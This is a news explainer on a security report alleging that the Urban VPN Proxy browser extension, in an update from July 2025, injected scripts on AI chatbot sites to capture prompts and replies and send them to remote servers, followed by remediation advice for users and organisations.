Researchers say the Urban VPN Proxy browser extension injected code on major AI sites to capture users’ prompts and chatbot replies and send them to remote servers—raising urgent privacy and compliance questions for anyone who used it.
What happened and who it involves?
A recent security report alleges that Urban VPN Proxy, a free “VPN” extension for browsers, quietly added a capability that can collect user activity on popular AI chatbot websites. The concern is not about normal VPN routing alone. The report focuses on the extension’s ability to run scripts inside web pages, which can let it observe what people type and what they receive back—especially on sites like ChatGPT and Google Gemini, along with other major AI assistants.
Urban VPN Proxy is widely distributed through official extension stores and has been promoted as a privacy product. That creates a strong contrast with the allegation a tool marketed for privacy may have been positioned to capture some of the most sensitive text people produce online today, including work drafts, legal questions, medical concerns, personal identifiers, and business plans—anything a user might paste into an AI chat.
The researcher findings matter because browser extensions can have deep access. If a user grants permission for an extension to “read and change” data on websites they visit, that permission can apply to the content of pages, forms, and live web apps—including AI chat interfaces. In practice, that access can be more revealing than many users realize, because AI chats often contain private material that would never be posted publicly.
Timeline and how this became a security issue?
Researchers tied the alleged AI conversation capture to an update introduced in July 2025, describing it as a meaningful behavior change compared with earlier versions. The key risk with extensions is that updates can happen automatically. A user who installed a tool for one reason—like basic browsing privacy—may not notice when its behavior changes weeks or months later.
That is one reason extension incidents can spread quickly: distribution is centralized, updates are frequent, and permission models are broad. If an extension has millions of installs, even a short window of questionable behavior can affect a large number of people.
Here is a simple timeline based on the claims described in the research and the extension’s public update history:
| Date / period | Reported development | Why it matters |
| Before July 2025 | Researchers say earlier builds did not include the AI-harvesting logic they later observed | Establishes a “before vs. after” shift in behavior |
| July 2025 | Researchers say AI-targeted collection was added and enabled by default | Users may have been exposed without taking any new action |
| Mid–late 2025 | Extension continues to be distributed and updated | Updates can keep the feature active or change how it works |
| Present concern | Users may not know prompts and replies could be collected | AI chats frequently include sensitive information |
This issue is not limited to one brand or one store. It highlights a pattern: any extension that combines broad site permissions with “analytics” or “marketing measurement” components can become a high-risk channel for data collection.
How the alleged collection works in plain language?
The report’s core claim is that Urban VPN Proxy used site-specific scripts that activate when users visit certain AI platforms. This matters because AI chat apps are interactive: they send your prompt to a server, and the response returns to your browser. If an extension can watch those requests and responses, it can reconstruct the conversation.
In simple terms, researchers described the behavior like this:
| Step | What happens | What it can expose |
| 1 | The extension detects you opened a supported AI website | Which AI tools you use and when |
| 2 | It injects a script into the page (tailored to that AI site) | Access to the chat interface and the data flowing through it |
| 3 | The script monitors communication between the page and the AI service | Your prompts, the model’s replies, and conversation metadata |
| 4 | Data is packaged and sent outward to remote endpoints | Centralized collection across many users |
A key point in the findings is that this type of collection can happen even if the VPN “tunnel” feature is not actively being used. That distinction matters because many people assume a VPN extension only “does something” when they press connect. In reality, an extension can still run background processes and page scripts whenever the browser is open.
This also explains why AI sites are a special target. Unlike a normal static webpage, AI chats often involve long form text. They may contain:
- Draft press releases, proposals, and unpublished articles.
- Personal stories and sensitive questions.
- Password reset emails pasted for “summarizing”.
- Company details, client notes, contract text, or financial figures.
Once text leaves a user’s browser environment, it can be stored, analyzed, shared, or re-sold—depending on how the collector operates and what policies or partnerships exist.
What data may be at risk and why it’s unusually sensitive?
The reported concern is not merely “browsing history.” AI conversations can combine identity, intent, and context in one place. A single prompt might include a person’s name, phone number, work role, health question, and location. A response might include recommendations that reveal the user’s situation. Together, that can become a detailed profile.
Researchers described the data types as including user prompts and AI responses, plus surrounding metadata that can help connect activity over time. While exact captured fields can vary by platform and implementation, these are the typical categories involved in this kind of interception:
| Data category | Examples | Why it matters |
| Prompts you type | Questions, drafts, pasted documents | Can include confidential or regulated information |
| AI replies | Generated answers and edits | Can reveal the topic even if the prompt is partial |
| Conversation metadata | Timestamps, session or conversation identifiers | Helps correlate activity across days and devices |
| Platform targeting | Which AI services you visited | Reveals tools used for work, school, or personal needs |
The risk grows because many users treat AI chats like private notebooks. They paste content they would never publish. They also use AI assistants during time pressure, which can reduce caution (for example, “summarize this email thread” or “rewrite this contract clause”). That makes AI text streams especially valuable to advertisers, analytics firms, and data brokers—while also being dangerous if exposed.
Trust signals, extension policies, and why this keeps happening
One of the biggest real-world issues is that users often rely on trust signals—store placement, badges, big install counts, and polished branding—when deciding what to install. VPN tools are especially powerful because they promise protection and because people install them at moments when they feel vulnerable or exposed.
But the extension ecosystem has structural weaknesses:
- Permissions are broad: “Read and change data on websites you visit” can include access to forms, chats, and dynamic apps.
- Updates are silent: an extension can change behavior after install.
- Data flows are invisible: users can’t easily see what gets transmitted.
- Business models are murky: “free” privacy tools often monetize through traffic, partnerships, or analytics.
Most extension marketplaces have policies restricting abusive data practices, including limits on how data can be used or shared. But enforcement tends to be reactive and difficult at scale. Researchers and journalists often become the first line of defense, because they can reverse-engineer behavior and publicly document it.
This case also highlights a modern challenge AI conversations are becoming a new class of sensitive data, but many privacy frameworks still treat them as general “web activity.” In practice, AI prompts can be closer to emails, documents, or private messages than to ordinary browsing.
For publishers, businesses, and schools, the lesson is clear: “VPN extension” does not automatically mean “safer.” It can mean “more privileged access,” which is helpful when properly managed—and dangerous when misused.
What users and organizations should do now?
If you used Urban VPN Proxy (or any similar free VPN extension), the safest approach is to treat this as a potential data exposure event and respond quickly and calmly.
Here are practical steps that do not require advanced technical skills:
| Action | What to do | Why it helps |
| Remove the extension | Uninstall it completely (not just disable) | Stops page-level scripts and background data flows |
| Review extension permissions | Check which extensions can “read and change” site data | High-risk permission for chats, email, docs, banking |
| Separate work and personal browsing | Use separate browser profiles or separate browsers | Limits the blast radius if one profile is compromised |
| Rotate sensitive credentials | Change passwords for key accounts used in that browser | Reduces risk if sessions or account context was exposed |
| Revisit what you pasted into AI chats | Identify any secrets, keys, client info, or personal data | Guides what you should protect next |
| Add guardrails for future use | Avoid pasting private identifiers into chat tools | Reduces harm even if another tool is compromised |
For organizations (media companies, agencies, universities, startups), the best response is a combination of policy and technical controls:
- Maintain an approved extension list and block unknown installs.
- Run regular extension audits on managed devices.
- Train staff that AI chats can carry sensitive data.
- Encourage “least privilege” browsing: fewer extensions, fewer permissions.
- Use enterprise browser controls where possible.
Finally, if a user believes they shared regulated data (such as client PII, medical data, legal documents, or credentials), it may be appropriate to follow internal incident procedures. The goal is not panic. The goal is minimizing risk and preventing repeat exposure.






